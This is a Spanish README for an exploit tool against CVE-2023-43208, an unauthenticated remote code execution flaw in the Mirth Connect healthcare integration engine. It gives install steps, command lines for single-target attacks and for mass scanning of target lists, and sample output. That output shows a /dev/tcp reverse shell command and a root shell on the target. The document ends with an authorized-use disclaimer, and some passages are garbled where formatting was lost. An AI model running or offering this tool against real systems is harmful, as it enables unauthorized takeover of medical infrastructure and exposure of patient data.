
Exploit de RCE no autenticado para CVE-2023-43208 en Mirth Connect mediante deserialización XML, con detección de versiones, escaneo masivo y shell PTY interactiva.
Exploit de Prueba de Concepto para CVE-2023-43208, una vulnerabilidad de Ejecución Remota de Código no autenticada en Mirth Connect versiones anteriores a
4.4.1.
Mirth Connect es un motor de integración sanitaria de código abierto ampliamente implementado. Esta vulnerabilidad aprovecha una falla de deserialización de Java a través del endpoint /api/users usando un payload XML manipulado que encadena gadgets de Apache Commons Collections para lograr RCE no autenticada.
La versión mejorada reemplaza el listener pwncat original con un shell PTY interactivo completamente libre de dependencias usando solo builtins de Python (socket, , , ). El shell se actualiza automáticamente a un PTY completo al conectarse.
selectttytermios| Software | Versiones Vulnerables | Versión Corregida |
|---|---|---|
| Mirth Connect | < 4.4.1 | 4.4.1+ |
python3/python/script)stty rows/cols)pwncat — solo stdlib para el listenergit clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt
requests
packaging
rich
alive-progress
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt
| Flag | Descripción |
|---|---|
-u, --url | URL del objetivo |
-lh, --lhost | Tu IP de escucha |
-lp, --lport | Tu puerto de escucha |
-bp, --bindport | Puerto de enlace alternativo (útil con ngrok) |
-f, --file | Archivo que contiene lista de URLs objetivo |
-o, --output | Guardar objetivos vulnerables en archivo |
-t, --threads | Número de hilos para escaneo (por defecto: 50) |
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...
root@mirth:/#
Esta herramienta está destinada únicamente para pruebas de penetración autorizadas y fines educativos.
El uso no autorizado contra sistemas que no poseas o para los que no tengas permiso explícito es ilegal.
Los autores no se responsabilizan por cualquier mal uso o daño causado por esta herramienta.